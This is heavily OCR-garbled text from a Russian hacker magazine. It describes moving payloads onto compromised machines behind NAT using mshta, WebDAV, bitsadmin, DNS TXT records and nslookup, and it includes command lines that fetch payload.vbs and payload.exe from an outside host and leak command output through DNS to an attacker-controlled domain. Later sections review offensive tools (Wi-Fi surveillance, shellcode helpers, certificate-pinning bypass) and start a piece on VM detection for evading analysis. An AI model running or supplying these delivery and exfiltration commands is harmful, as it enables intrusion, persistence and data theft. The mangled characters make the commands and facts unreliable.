в ѴѴЗР. В ѴѴЗР содержится ѴВЗсгірІ, который читает себя как ХМІ_ 
(как ранее было отмечено, ѴѴЗР описывается ХМ1_), берет пер- 
вый элемент и сохраняет содержимое в саЬ. Полученный ѴѴЗР 
преобразуется в Ьаі путем добавления к каждой строке «@есЬо 
... > рауіоасі .ѵѵзі» . На основе скрипта 222 ЕѴА 222 была реализова- 
на версия на РоѵгегЗЬеІІ. Теперь можно конвертировать целевой 
саЬ в ѴѴЗР или Ьаі. Ее ты сможешь найти на нашем диске. 

М8НТА 

МзЫа.ехе (МісгозоИ НТМІ_ Арріісаііоп Нозі) — служебная про- 
грамма для выполнения НТА (НТМ1_ Арріісаііопз). НТА — это 
НТМІ_-страница, которая имеет доступ к ресурсам системы че- 
рез СОМ, выполняя скрипты иЗсгірІ/ѴВЗсгірІ. В принципе, это 
полноценный Іпіегпеі Ехріогег, только без зон безопасности. 
Таким образом, у нас есть возможность изменять реестр, ра- 
ботать с файлами и сетью. Утилита принимает один параметр 
командной строки — то, что попадет в Ьгоѵѵзег аЬЬгезз Ьаг. По- 
этому мы можем передать ссылку на НТА или скриптовый блок. 
Расширение не имеет значения. Выполняем ѴВЗсгірІДІЗсгірІ, 
расположенный на удаленном хосте: 

ШзЬЬа „ЬЫ: р://1. 2. 3 .4_: 80/ рауіоасі . ѵЬз 
тзЬЬа ЬЬЬр з : //1 . 2.3.4: 443/рау Іоаб . ѵЬз 



тзИЬа ѵЬзс гір і : Ехе сиЬе Г "ИЗсгірЬ.ЕсІіо 1") 
тБЬ'Ьа іаѵазсгірЬ: ЕхесиЬе^ ' ИБсгірЬ . ЕсЬо(1) ; 1 ) 

ѴѴЕВОАѴ 

Протокол прикладного уровня, расширяющий возможности 
протокола НТТР/НТТРЗ для удаленной работы с файлами. На- 
чиная с версии ѴѴіпсІоѵ/з ХР клиент ѴѴеЬОАѴ реализован в виде 
службы ѴѴеЬСІіепІ. Серверная часть представлена, как прави- 
ло, расширениями для АрасЬе и 113. ѴѴеЬОАѴ, так же как и ЗМВ/ 
СІРЗ, решает задачу с поиском папки для записи — расширение 
дискового пространства с правами на запись для группы «Все». 
По сравнению с ЗМВ/СІРЗ применение ѴѴеЬОАѴ в некоторых 
случаях более гибкое, так как поддерживает работу по НТТР. На- 
чиная с версии ѴѴіпсІоѵѵз ХР ЗРЗ, а именно предустановленного 
апдейта КВ892211, появляется поддержка 35і_ и возможность 
выбора произвольного порта. Более ранние версии ѴѴеЬОАѴ 
пліпі-гесіігесіог поддерживают работу исключительно по НТТР 
и 80-му порту. В корпоративных средах повсеместно распро- 
странена практика использования прокси-серверов в качестве 
шлюза в интернет. В тех случаях, когда другие способы не ра- 
ботают — нет поддержки прокси-сервера, целесообразно ис- 
пользовать ѴѴеЬОАѴ. 

РПОХѴ8ЕТТШС8 

Давай рассмотрим тему настройки прокси-сервера для поль- 
зователя. С точки зрения системного администрирования су- 
ществуют четыре возможных сценария предоставить пользова- 
телю настройки прокси-сервера: 

- ѴѴРАО; 

• РАС; 

• Сгоир роіісу; 

• ЬІзегсЬоісе. 

ѴѴРАО 

ѴѴеЬ Ргоху Аиіо-Оізсоѵегу Ргоіосоі используется, если в на- 
стройках браузера активна Аиіотаіісіу Ьеіесі зеНіпд. 

Настраивается соответствующими записями на серверах 
0143 или ОНСР. При получении настроек через ОЫЗ должно 
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соблюдаться условие публикации файла: только НТТР, толь- 
ко 80-й порт. В ОНСР может использоваться любой порт. 
Если ты смотришь на ІІРЯ_ настроек ѴѴРАЭ и там использу- 
ется нестандартный порт, то знай, что настройки получены 
по ОНСР 

Например, компьютер находится в домене гі .с^.рПсІауз. 
сот. В поисках файла настройки браузер последовательно 
обращается к таким ІІВІ_: 

• ИНр ://ѵѵрасІ . г 1 .сІ2.р[ісіауб.сот/\л/расІ.сіа1 

• МНр://шрасЫ 2 .рИбау 5 .сот/шрасІ.сІа 1 

• МНр://ѵѵрасІ.рйсІау 5 .сот/Ѵфа( 1 .сІа 1 

• ІіНр://шраб.сот/ѵфасІ.с1а1 (ООООР5!) 

РАС 

Ргоху аиіо сопіід — на практике ѴѴРАО — это и есть переиме- 
нованный файл с РАС. Если посмотреть код, то обнаружишь 
там ^ѵаЗсгірІ-функцию РіпсІРгохуРогияІ_, которая возвращает 
адрес прокси-сервера в зависимости от запрашиваемого хо- 
ста. 




ѵѵ\ѵѵѵ 

Презентация доклада: 

Ьі!.Іу/ 1 1сТфу 

Небольшой «сбеаі 

зЬееі»: Ьіі.Іу/'МуМтЗѴѴ 

Демо использования 
пзіоокир: Ы1.[у/15и0Р46 



>>= Ыіпсіоиз ѴІ5ѣа (ІЕ ргоху) 

5еѣ-І1:етРРОрег1:у 'НКСЦ: ЧБоРіыагеХМісгозо-РЕѴЫІпсІоызХ*-' 
Сиггеп1:Ѵег5Іоп\Іп1:егпе1: Беі ііп ^з ' -пате 

РгохуЕпаЫ е -ѵаіие 1 5е1:-І1:етРгорег'бу ' НКСІІ: Ѵ- ; 

Бо - Р1:маге\! ѵ Іісго5о-р'І:\ЫіпсІоы5\СиггепіѴеГ5Іоп\< = і 

Іпіегпеі: Бе1:1:іп§5 ’ ^-пате РгохуБегѵег "ргоху : 3128" 



> Ыіпсіоыз ХР & 2003 (ІЕ ргоху) 

ргохусРё -р ргоху: 3128 



> Ілііпфыз ХР & 2003 (5у5±ет ргоху) 

ргохусРб 



ѴѴЕВОАѴ 

Рассмотрим шаги для установки ѴѴеЬРАѴ на Арасбе. Энэйблим 
модуль ѴѴеЬОАѴ: 



Демо использования а2егмюсІ сІаѵТз 

апу2Ьа1: ЫІ.І ѵ /І ІѵМхІН а2ептосІ сіаѵ 



ОРОІІР РОУСУ 

Групповыми политиками назначают РАС или отдельно прокси- 
сервер для протокола. 



/е1:с/іпі'1.сі/арасІпе2 гезііагі: 
Настраиваем ѴѴеЬОАѴ 



УЗЕРСНОІСЕ 

Прокси-сервер не назначается администратором домена. 



ткДіг -р /ѵаг/млм/ыеЬ/ 
сИомпзмм-сіа'Іа /ѵаг/тм/меЬ/ 



ОІСОЕЕРЕЙ 

Рассмотрим такую ситуацию: успешная эксплуатация хоста — > 
привилегии ЫТ АІЛНОЯІТУ\\ЗУЗТЕМ -* прокси-сервер на- 
строен у пользователя. Следующим шагом необходимо уз- 
нать адрес прокси-сервера. Вполне логично предположить, 
что пользователей может быть несколько с различными прок- 
си-серверами, в зависимости от групповых политик. Возни- 
кает резонный вопрос: каким образом можно получить вывод 
исполнения команды? Стоит отметить, что сетевые настройки 
общие для системы, в том числе ОИЗ. А в большинстве случаев 
внутренний йНЗ является авторитативным и сам разрешает до- 
менные имена в (Р-адреса. Таким образом, имея подконтроль- 
ный ОМЗ-сервер с настроенным логированиѳм, отвечающий 
за нашу зону, мы сможем просматривать вывод команд. Реали- 
зуется это следующим образом: 



тзЬіа " 2 а ѵа зсгірі: : Типсііоп И(оиѣ)<-‘ 



ІНхсІ= 1 1 ; іог(і 


3=0 


іакои'1 . 1епе'Ыі:а=а+1)-ПіхсІ=Іпхс!+ои1:.<-‘ 


сНагСогіеАКа) .■Ьо51:гіпе(16) ;>геі 


ігп Ихй : ІГипсРіоп <-■ 


КстеОІѵаг зИеІІ 


=пеѵ АсІіѵеХОЬіесК ‘ІлІБсгірІі.БІіеІІ ' 


ѵаг 5е=5Іпе11 


. ЕхесГстсП :ѵаг оиі: - 


= ' ' :мИ11е( 


(5е . БѣсІОиІ: . АІіЕпсЮ'РБІігеат) ) {ои1:=ои1:+5е . БІісІОиІ: .*-» 


КеасЛіпе( ) : }і 




агп оиі: : ѴРипсІіоі 


і ех(стс!){ѵгг оиі:=^ 


Іп(г(стсІ) ) :аиегу= 


=ои1: .та'бсІіС/ . (1 ,60}/е) : Рог ( ѵ=0 : 


<аиегѵ* ІеПЕѣИ ;ѵ= 


=ѵ+1){г( ' пзіоокир ' +ѵ+ 1 х'+аиегуГѵІ-ь- 1 


1 л/а.ги 1 )>: V 




сѣіоп еП(ех( ' ргохѵс-Рн ' ) : І-міпсІоы.'н-і 


оп1оасі=е" 



Если у нас привилегии пользователя, то настройки прокси 
можно посмотреть так: 

>>=_ Ніпсіоыз ѴІ 5 *а (зу 5 І;ет ргоху) 

пе’бзіі міпЫі'Іір з Ном ргоху 



ѵіт /еТс /а расІіе г/зі'Е е з-аѵаіІа Ые /сІеГ аиП: 
МатеѴігІиаІНозІ: * 

< ѴігТи а ІНо зІ: *> 

БегѵегАсІтіп меЬтаз1:ег(аіоса1Но5І; 
ОоситепІРооІ: /ѵаг/ммм/меЬ/ 

<0ігес1огу /ѵаг/ммм/меЬ/> 

Орііопз Іпсіехез Ми11:іѴіем5 
АІІоыОѵеггісІе Моле 

О гсі е г аііо і^ Делу 

аііом -ргот аіі 
</Рі г ес1:огу> 

Аііаз /меЬсіаѵ /ѵар/ммм/меЬІ 

<І_оса1:іоп /меЬс!аѵ> 

РАѴ Оп 
</ і.оса1іоп> 

< УѴіг1:иа1Но5'б> 



/е1:с/іпі'1.сІ/арасНе2 геіоасі 

Готово! Теперь можно использовать наш уютный сервис 
с удаленной машины :). Например, существует множество спо- 
собов примонтировать свежеиспеченный ресурс: 

пеі: изе х:_ ЬТір_іУ/1 .2. 3 .4/меЬс1аѵ 

пеТ изе х: И11:р5^/1.2.3.4/іліеЬсІаѵ /изѳпіСие5І: Сиезі: 

пеі: _изе х: \\1 . 2. 3 .4\меЬсіаѵ 

пеі: изе х :_ \\1. 2 . 3 .4@55ЦЭ53\меЬсІаѵ 

пеі: изе х:_ \\1. 2. 3 ._4@53\меЬс1аѵ 

После чего, удачно смонтировав ресурс, копируем необхо- 
димый файл командой сору :) 

сору X: Храуіоасі . ехе С: Храуіоасі .ехе 



>>^_ НІПСІ0М5 ѴІ5±а (ІЕ ргоху) 

ге§ чиегу "НКЕ У СІІККЕМТ ЦБЕКХБоіІіма геХМісгозот*-- 
к1іпоіом5\Сиггеп1:ѴеГ5Іоп\Іп1:егпе1: БеІ’Ніпёз" /ѵ <-■ 
РгохуБегѵег' 



> ІЛІІПСІ0Ы5 ХР & 2003 (ІЕ рГОХу ) 

пе1:5Н с!іа§ соппесі: іергоху 



> Ілііпгіоыз ХР & 2003 (зузѣет ргоху) 

ргоху с 

Установка настроек прокси-сервера: 

>>=_ИіпсІои5 Ѵізѣа (зу5І;ет ргоху) 

пе1:зН міпІгЫр зе! ргоху ргоху : 3 1 28 



ыбюокир 

Ызіоокир является средством администрирования на ос- 
нове командной строки и предназначена для проверки ра- 
ботоспособности ОМЗ-серверов. Имеет два режима рабо- 
ты: интерактивный и консольный. Если нет возможности 
установить ТСР-соединение с подконтрольным сервером, 
то можно использовать внутренний ОМЗ для обмена данны- 
ми с сетью. В 2008 году Кевин Бонг (Кеѵіп Вопд) рассмотрел 
и реализовал способ создания неинтерактивного шелла че- 
рез опрос ТХТ записей ( Ы1.Г 14а 1 ). Максимальная дли- 

на 1x1 — 255 символов. Все кавычки в записи должны быть 
экранированы. Так как вывод пзіоокир не содержит испол- 
няемых команд, можно сделать проще и короче: заэкрани- 
ровать обязательные обрамляющие кавычки и записывать 
вывод в Ьаі. 
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I Н 



Ф, 



31 



ІЛЬ 



1ЯЧК 




Правим запись М для подконтрольного домена {сі. Стандартный вывод 

аііаскег.сопл): пзіоокир -іуре=ТХТ 

уапсіех.ги 

\" & (ЭесЬо Л <раска§е Л > Л <саЬ хтіпз :сІ1:=\"игп 

5сИегпа5-тісгр$о-Р1:гСот;с1а'Ьа1:уре5\" сіі: : с!і:=\ " Ьіп . <-■ 

Ьазеб4\" л > храуіоасі & \" 

После чего на клиенте запускаем пзіоокир и перенаправля- 
ем вывод в файл: 

пзіоокир лЬуре=ТХТ_с1 . аЬ1:ас_кег . сот >> рауіоасі . Ьаі ^ 

& рауіоасі . ЬаЬ 

РОѴѴЕК8НЕЫ. 

Это фреймворк, созданный МісгозоН:, для автоматизации задач 
системного администрирования. Имеет СІ_І, подобный СМО, 
со встроенной поддержкой и интеграцией .ІЧЕТ Ргатеѵѵогк. 

Разработка началась в 2002 году под названием МопасІ. Пер- 
вая ПС-версия появилась в 2006 году и была переименована 
в ѴѴіпсІоѵ/з Ро\л/ег5ЬеІІ. С выходом ѴѴіпсІоѵ/з Ѵізіа 5Р1 поставля- 
ется как компонент ОС. ѴѴіпсІоѵ/з 8/2012 поставляется с третьей 
версией, значительно расширенной командлетами. ѴѴіпбоѵѵз 
7/2008 поставляется со второй версией. 

Ро\л/ег31іеІІ — это такой слой абстракции, который делает 
удобной работу с компонентами системы: СОМ, ѴѴМІ, АР8І. 

В результате мы имеем простой унифицированный способ 
управления системой локально или удаленно. 

Функциональность РоѵѵегЗІіеІІ обеспечивается командле- 
тами — специальными командами, реализующими конкрет- 
ный функционал. Например, командлет Сеі-Сопіепі или его 
алиасы дс и саі — получить содержимое файла. При написа- 
нии командлетов принято придерживаться именования ѵегЬ- 
поип. Результат командлета — это объект или коллекция. При- 
меры кода, реализующего слив файла, ты найдешь на нашем 
диске. 

ВІТ8АОМІЫ 

ѴѴдеІ для ѴѴіпсІоѵ/з :}. Этим все сказано. Параметры запуска до- 
статочно просты: 

ЬіЬзасІтіп /Ьгапз-Рег мИаІіеѵег ІгЫір : //1 .2.3.4: 80 Л-< 
рауіоасі. ехе с :\рау1оасІ .ехе 




и». Мы получили 



встречают 

■ 



ся с пиджаками, а парни с Ангичага обсуждают ре- 
зультаты взлома интернет-банка с топ-менеджером 
из финансовых структур. Презентация, по моти- 
вам которой подготовлен этот материал, доступна 
по адресу шашш і в/1 йпР/ѵг. Информацию о самом 



мероприятии, а также список доступных материалов 



ты мажешь посмотреть на официальном сайте этой 






уникальной хакерской конференции { 



ШГ\ 



ТГ 



V). 




Или же можно создать целую задачу для загрузки серии 
файлов с удаленного ресурса: 



ВМЕСТО ЗАКЛЮЧЕНИЯ 



ЬіЬзасІтіп /СКЕАІЕ_/РОШи)АР іоЬпате 
ЬіЬзасІтіп /АРРРІІ_Е_ ^рЬпате М:1:р://1.2.3.4/<-< 
рауіоасіі. ехе рі.ехе 

Ьііізасітіп / АРРРИ Е ^оЬпате ЬЫ:р://1 .2. 3 Л/-> 
рау!оасІ2. ехе р2.ехе 
ЬІЬзасІтіп /КЕ 51ІМЕ з’оЬпате 
Ь11і5асІтіп /СОМРІЕТЕ ^оЬпате 



В своей статье я постарался подробно прояснить 
ситуацию с загрузкой файлов на машины за ІЧАТом . 
Надеюсь, что это хорошая отправная точка для даль- 
нейшего ресерча и изучения множества других кле- 
вых «хаков». Если у тебя остались вопросы или ком- 
ментарии, я с радостью на них отвечу. Удачного тебе 
закрепления на удаленной машине! Зіауіипеб! 
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ШАКШЫС 

Внимание! Информация представлена исключи- 
тельно с целью ознакомления! Ни авторы, ни редак- 
ция за твои действия ответственности не несут! 




Дмитрий «ЭІдЬ Евдокимов, 
Рідііаі Бесигііу 

ѵООКі ГП О V 05 




СОФТ ДЛЯ ВЗЛОМА И АНАЛИЗА БЕЗОПАСНОСТИ 




Рірі ТГтІіі, Нрі|'і 

^ Ті г*м і :Гигпіі І ;іиііі (Ніи ѵ 

1 2 О 

И * 



ГіраІ Гм: 



№$рІН 



іпѵііігі . 1 1 ^ ! 1 1 іл у гтаѵчгпу 1 иі 5 І^скі гпяпу 

іпрЩ (кгіпд і эгИлігш ти.ііій Ыамд&4 рЬвгіСЯН [(йі 



РідіГі 5екЧ 4 МТР-в I Н-* ™-*г 5еПшдъ 





Пй 


01 


Й7 


лз 


04 


05 


ЛЛ 


07 


СИ 


ЙО Он ОІі ОН Он 




3$ 


47 


С.Ц 


77 


лё 


12 


7В 


70 


02 


Оеі 33 73 49 47 43 


Пий 


31 


0* 


бе 


30 


5а 


за 


4гі 


07 


34 


07 4Г. 7 Г. г,т, г й л? 

Зеіесі агЧ 

Кеер агіу ЗеІесЕей 
►ІЗт^ 

нот ^1» 


ОхМ 


зг 


47 


46 


30 


61 


57 








0x30 


















0*4о 


63 


75 


42 


74 


55 


57 


35 


70 


63 


0*54 


62 


32 


34 


67 


64 


53 


52 


70 


62 


цоіб Итого <ІІрЬеі4ій 



Автор: N 00 Огоир 
Система: Шпйот/ 
І_іпих 

пссдгоир.дііІшЬ. іо/ 

рІрЗІіпе/іпгіех.ІіІтІ 





Автор: ЗепзеРозІ 
Система: Ьіпих 

Щр5:// аіИіи Ь.сот/ 

зелзеровІ/Зпоору 




гЬеХХпооЬ.ру Е — Гіч 
СЬ і - ] 

зЪеХХпооЪ-ру -і (.{> 
вЬе ХХпооЬ. ру —с <іі 
опХу рХа<:€огт: 
зііе ХХпооЬ. ру — 64 
зЬеХХпооЬ.ру — де*;- 
эЬе ХХпооЬ. ру — деі;- 

зирроКеА ІИРиТ ? о: 
зиррог^ей ОиТРЦТ 



Автор: Ѵапіск 
Ргаіапіопіо 
Система: ѴѴІпсІсшз/ 
□лих 

Іі!ІР5://оШіиЬ.сот/ 

геѵаттег/зІіеІІпооЬ 




И ГРАЕМ С БАЙТИ КАМ И 



ПОД КОЛ ПАКОМ 8ЫООРѴ 



ПОМОЩНИК ШЕЛЛ -КОДЕРА 



Если тебе часто приходится иметь дело с не- 
обработанными/сырыми массивами байтов, 
то инструмент под названием РірЗІІпе как раз 
для тебя — он упростит твою работу. Если корот- 
ко, то это просто инструмент для манипуляции 
над массивом байтов, при этом в инструмент 
заложен набор стандартных преобразований, ко- 
торые можно применять как в одну сторону, так 
и в обратную. Для преобразования достаточно 
выделить необходимые байты и выбрать тип пре- 
образования над ними. РірЗІІпе поддерживает 
множество различных трансформаций, таких как: 

• Вазе32/Ва5е64; 

• Віпагу епсобіпд; 

• Ведиіаг Ехргеззіоп (таісіі&ехігасу 
таісіз&геріасе); 

• Ш Епсобе; 

• Хог; 

• 2ІіЬ сотргеззіоп; 

• Мб4/Мб5/ЗИа1; 

• ЗиЬзШиІіоп сгуріо аідогібзт. 

В процессе работы с инструментом можно 
вернуться в любую точку цепочки преобразова- 
ний, выполненных над файлом. При этом преоб- 
разования можно выполнять над группой файлов 
или над блоками данных, полученными из ТСР 
зоскеу ЫаплесІ Ріре (ѴУіпсІоѵѵз) или ІІЫІХ Зоске! 
(ІІГ\ІІХ/І_іпих). 

Но всем этим функционал программы, ко- 
нечно, не ограничивается. Авторы программы 
потрудились и создали специальный интер- 
фейс для плагинов, благодаря которому можно 
на С++/01 писать собственные преобразователи, 
а как альтернативный вариант можно использо- 
вать и всеми любимый Рубіо п. 



Как говорят сами авторы проекта Зпоору, на его 
создание их вдохновила активная в последнее 
время деятельность государств, легализующих 
слежение за гражданами в интернете {посещае- 
мые веб-сайты, почта, социальные сети и так да- 
лее) под предлогом борьбы с терроризмом. 

Зпоору — это распределенный трекинговый 
и профилирующий фреймворк, позволяющий 
производить слежку за мобильными устройства- 
ми, использующими ѴѴі-Рі. Почему распределен- 
ный? Потому что клиентская часть программы 
может быть установлена на любое устройство под 
управлением ОС І_іпих (телефон, роутер, мини- 
ПК) с поддержкой режима монитора и инъекцией 
пакетов. И каждое такое устройство с клиентской 
частью будет отсылать данные на центральный 
сервер. Среди отсылаемой информации: 

• время; 

• МАО клиента; 

• 53Ю сети; 

- ОРЗ-координаты; 

• уровень сигнала. 

Программа также способна идентифициро- 
вать устройства владельцев через ЗЗЮ сетей 
и захваченные ргоЬе запросы. И это может быть 
сделано двумя способами: простым анализом 
и с помощью геолокации (через такой сервис, 
как ѴѴідІе). Помимо этого, программа умеет про- 
изводить МІТМ -атаку и извлекать данные из тра- 
фика (соокіе, логины и пароли, РЭР, ѴоІР-звонки 
и так далее) и даже такую информацию, как спи- 
сок фолловеров в ТміКег и все друзья из РасеЬоок. 

Также хочется сказать, что у программы удоб- 
ный веб-интерфейс для просмотра результатов 
и интеграция с Маііедо. 



Написание шелл- кода обычно состоит из двух 
частей: суперувлекательной и чрезвычайно 

муторной, скучной. Благодаря инструменту 
ЗИеІІпооЬ можно сфокусироваться на первой ча- 
сти, а остальное возложить на плечи данной раз- 
работки. Особенности: 

* конвертирование шелл-кода между различ- 
ными форматами (сейчас поддерживаются: 
азпл, Ып, Ііех, оЬ|, ехе, С, Руііюп, РиЬу); 

* интерактивный режим преобразования 
орсобе-Іо-Ьіпагу (и обратно); 

• определение номеров зузсаІІ и констант (те- 
стовая поддержка); 

• портативность (необходимо только ССС/аз/ 
оЬдбитр и Рубіоп); 

• работа прямо на целевой архитектуре; 

* вставка брейкпоинтов; 

* переключение между 32Ы1/64Ы1:; 

• поддержка чтения из зібіп / записи в зісіои!. 

Рассмотрим пару примеров использования. 
Конвертирование шелл -код-файл а на ассембле- 
ре в бинарный формат: 

. /зІіеІІпооЬ .ру -- ^гот-азт <-■ 

зИеІІсобе. азт --1:о-Ьіп зИеІІсобе . Ьіп 

Работа в интерактивном режиме, где получа- 
ем орсобе-инструкции: 

$ _.УзІіе11пооЬ.ру -і_ 

і п о_о р с об е (1) ог о р с о б е_ѣ о_і п 5 

( 2 )?: 1 

іП5_±о_орсобе зеіесфеб 
>> тоу %еаx^ %еЬх 
тоѵ %еах л %еЬх ~> 89сЗ 
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Автор: ІЗЕС Рагіпегз 
Система: АпсігоісІ 



ШР5://аШіи Ь.сот/іЗЕСРаг1пег5Уаги1гоі{1-55І-Ь ѵра53 



ДАЕМ БОЙ СЕПТІРІСАТЕ 
РШІШ4С НААЫОПОІО 



В ОС АпсігоісІ для защиты приложений также мож- 
но использовать се гШісаІе ріппіпд, и для этого не- 
обходимо специальное доверенное хранилище. 
Об общих методах реализации сегйіісаіе ріппіпд 
читай в блоге Мохіе ( І1.І ѵ55 тхп). Технология ак- 
тивно используется втакихАпсІгоісі-приложениях, 
как ОоодІе Сбготе, ТѵѵіЯег, Сагсіз.іо. Существует 
множество путей обхода се гШсаІе ріппіпд: 

■ декомпиляция/патчи нг/переком пил яция/под- 
пись/загрузка; 

* кастомные ѴМ/РЮМ со встроенными хуками; 

■ хукер нативного кода или отладчик нативного 
кода (СОВ, ѵТгасе); 

* ^ѴѴР-отладчик. 



Заѵа РеЬид ѴѴіге Ргоіосоі (ЗОТѴР) — это стан- 
дартный инструмент отладки для Заѵа, кото- 
рый может программироваться через Заѵа АРІ 
и для своей работы задействует Заѵа ЭеЬид 
Іпіеііасе (301). Это и используют авторы инстру- 
мента АпсігоісІ 83І_ Вуразз для обхода сегйіісаіе 
ріппіпд. Алгоритм работы программы таков: 

■ остановка на Н’йрзІІВІ-СоппесІюп. 
зеіЗоскеІРасІогуО; 

■ замена переменной на переменную, означаю- 
щую «доверять всем»; 

• продолжение работы. 

Тулза протестирована на АпсігоісІ 2.3.3 и 4.0.3. 




10:55:59 етсіеТ. I 
Неііо сшу5, 



33 егадеі 



Автор: М/А 
Система: М/А 
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Автор: МоопЗоІз 
Система: ѴѴіпйоѵѵз 



ѵушшорпвоіз, 
г.от/201 1/07/1 Й/ 
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Автор: 

ІпІгерісІивСгоир 

Система: ЮЗ 

Іі!1 рз://ді1ІіиЬ.сот/ 

іпігеріскібдгоіір/ 

Ігіібіте 




РогепБісввѴМ 



НѴРЕП-Ѵ БЕЗ ГРАНИЦ 



ДАЕМ БОЙ СЕПТІРІСАТЕ РНММИС НА 108 



Асіаеоп — это инструмент для экспертизы памя- 
ти в виртуализированном окружении. Начиная 
работу с физическим дампом памяти, инстру- 
мент способен достичь трех важных целей: 

1. Обнаружить любой гипервизор (ѵігіиаі 
тасИіпе топііог), который использует техно- 
логию Іпіеі ѴТ-х. 

2. Обнаружить и проанализировать пезіесі 
ѵігіиаіігаііоп и показать отношения среди раз- 
личных гипервизоров, запущенных на одной 
машине. 

3. Предоставить транспортный механизм 
для распознавания и поддержки адресного 
пространства виртуальных машин. 

Асіаеоп состоит из трех компонентов: 

• Ііурегіз: плагин для Ѵоіаіііііу; 

• патч для ѴоІаШІу; 

• дампер ѴМСЗ, основанный на коде НурегЭВО. 

Инструмент работает независимо от гипер- 
визора и ориентируется на расположение ѴМСЗ 
структур данных в памяти. Таким образом, он дол- 
жен быть способен обнаружить любой гипервизор 
(хороший или вредоносный), который использует 
эту технологию. Программа прошла успешное 
тестирование с КѴМ (кегпеі 3.6.0), Хеп (4.2.0), 
ѴМѵѵаге ѴѴогкзІаІіоп (9.0.1), ѴИиаІВох (4.2.6) и по- 
следней версией НурегОВС — включая различные 
вложенные комбинации (например, КѴМ под ХЕЫ 
или ѴііТиаІВох под ѴМшаге). Пока программа те- 
стировалась только с 32-битными системами. 

Для успешной работы программы и, в принци- 
пе, ее дальнейшего развития (поддержки новых/ 
других ѴМ) необходимо знать смещение опреде- 
ленных полей внутри ѴМСЗ-структуры. 



Если говорить официально, то МоопЗоІз 
НурегТазкМдг — это предназначенный ІТ- 
профессионалам менеджер задач нового по- 
коления для управления ѴѴіпбоѵѵз ѴМ, запу- 
щенными под МісгозоИ Нурег-Ѵ В2 Нурегѵізог. 
НурегТазкМдг просто запускается на хостовой 
машине (представляет собой один ЕХЕ- и один 
ОЦ_-файл) и не требует установки. С его по- 
мощью можно легко увидеть всю информа- 
цию о процессах внутри гостевых ѴМ на базе 
ѴѴІпсІоѵѵз, и при этом ничего устанавливать на них 
не надо. 

Данная версия позволяет: 

• отобразить все процессы внутри ѴѴіпбо'л/з ѴМ 
и используемые ими ОІ_І_-библ потеки; 

• убить любой процесс в ѴМ; 

• предоставить на лету привилегии ЗУЗТЕМ 
к любому процессу внутри ѴМ; 

• разблокировать ѴМ, если ты не помнишь па- 
роля :); 

- включить тііідаіе ехріоііаііоп против эксплой- 
тов, использующих «Ргоіесі: адаіпзі пиіі раде 
аііаск». 

Защита против пиІІ раде аііаск базируется 
на основе исследования Тарьей Мандта (Тадеі 
МапсИ), и подробнее об этом можно почитать тут: 

ЬК.Іѵ/170іѴР4 . 

В принципе, эта фича напоминает то, что де- 
лает ЕМЕТ (ЕпІіапсесІ МШдаІіоп Ехрегіепсе 
Тооікіі), но только для режима ядра. Как видно 
из возможностей инструмента, его можно при- 
менять не только для простого управления вир- 
туальными машинами, но и при проведении 
пентестов, когда получается завладеть хостовой 
машиной, где уже развернута Нурег-Ѵ-среда. 



Разработчики не стоят на месте и придумывают 
все новые и новые механизмы для обеспече- 
ния безопасности своих приложений. СеНіИсаІе 
ріппіпд как раз одно из свежих и постепенно наби- 
рающих обороты веяний в области безопасности 
мобильных приложений. Если раньше, проводя 
атаку МІТМ 381_ на приложение, мы праздновали 
успех (прокси выдавала себя за сервер), то с при- 
менением сегШсаІе ріппіпд ситуация изменилась 
совсем не в пользу атакующего. Теперь возмож- 
ны ситуации, когда прямо в приложение вшит 
сертификат сервера или вшит СА-сертификат, 
которым подписан сертификат сервера. Таким 
образом, приложение уже знает, кому стоит дове- 
рять, а кому нет. И это дополнительно защищает 
при компрометации сертификатов верхнего уров- 
ня (вспомни случай с ОідіпаІог). Например, это 
уже применяется в Ѳоодіе СИготе с 13-й версии 
для всех Ооодіе-сервисов. Для мобильных при- 
ложений это очень удобно, поскольку, как прави- 
ло, они общаются с одним сервером или с очень 
ограниченным их числом. 

Это все значительно осложняет анализ сете- 
вого трафика при аудите приложения. Но выход 
существует. На платформе іОЗ есть замечатель- 
ный инструмент под названием і08 ЗЗІ_ КіІІ ЗѵѵіІсМ, 
который написан с использованием библиотеки 
МоЫІеЗиЬзІгаІе. Он перехватывает конструк- 
тор Н$ІІВІ_Соппес1іоп и подменяет в функции 
іпіІѴѴіІМРедиезІ: параметр беіедаіе, через который 
часто реализуют кастомную проверку сертифика- 
та (сегШсаІе ріппіпд — это частный случай). 

Кстати, для этих целей есть еще более удач- 
ный инструмент под названием ТгизІМе, он также 
реализован в виде МоЬіІеЗиЬзІгаІе и перехваты- 
вает ЗесТгизІЕѵаІаиІе, на более низком уровне. 











ОПРЕДЕЛЯЕМ ФАКТ ЗАПУСКА 
ПРИЛОЖЕНИЯ В ѴІНТІІАІ_ВОХ, 
ѴМѴѴАВЕ ѴѴОНКЗТАТЮГѵІ, ѴІРГГІІАІ_ 
РС И РАНАІ_І_ЕІ_5 ѴЮРКЗТАТЮМ 

Не каждому хочется, чтобы его, кхм, 
новый текстовый редактор какие- 
нибудь неприятные дядьки исследовали 
под виртуальной машиной. Детект 
виртуалок — обязательный функционал 
определенного рода софта, и поэтому 
наша рубрика ну совершенно никак 
не может обойтись без обзора 
соответствующих способов! 




Евгений Дроботун 

сігоЬоіип@хакер.ги 



КАК РАСПОЗНАТЬ ВИРТУАЛЬНУЮ МАШИНУ? 

Во-первых, любая виртуальная машина несет на своем борту 
какое-нибудь специфическое оборудование. Это касается ви- 
деоадаптера, жесткого диска, идентификатора процессора, 
версии В 105, МАС-адреса сетевой карты. 

Во-вторых, виртуальные машины оставляют следы в систе- 
ме в виде запущенных вспомогательных процессов, драйверов 
и других специфических объектов. 

В-третьих, если как следует покопаться в реестре виртуаль- 
ной машины, там можно найти много всяких интересных клю- 
чей, характерных только для виртуальных машин. 

Ну и в-четвертых, некоторые производители специально 
оставляют возможности, позволяющие обнаружить их продукты. 

Что же касается общих признаков наличия виртуальной ма- 
шины, предложенных в свое время госпожой Рутковской {ха- 
рактерное расположение таблиц ЮТ, СОТ и ЫЭТ, а также время 
выполнения операций процессором), то в настоящий момент 
все эти признаки трудно поддаются анализу и приведению 
к какому-нибудь общему знаменателю, главным образом из-за 
многоядерности и многоликости современных процессоров. 

АНАЛИЗИРУЕМ ОБОРУДОВАНИЕ 

Начнем, пожалуй, с жесткого диска. Если посмотреть иденти- 
фикатор жесткого диска в диспетчере устройств на виртуальной 
машине, то в его составе можно увидеть интересные строчки: 

РізкѴіг'ЬиаІ для ѴігЬиаІ РС 

РіакѴВОХ НАКРРІ5К для ѴігСиаІВох 

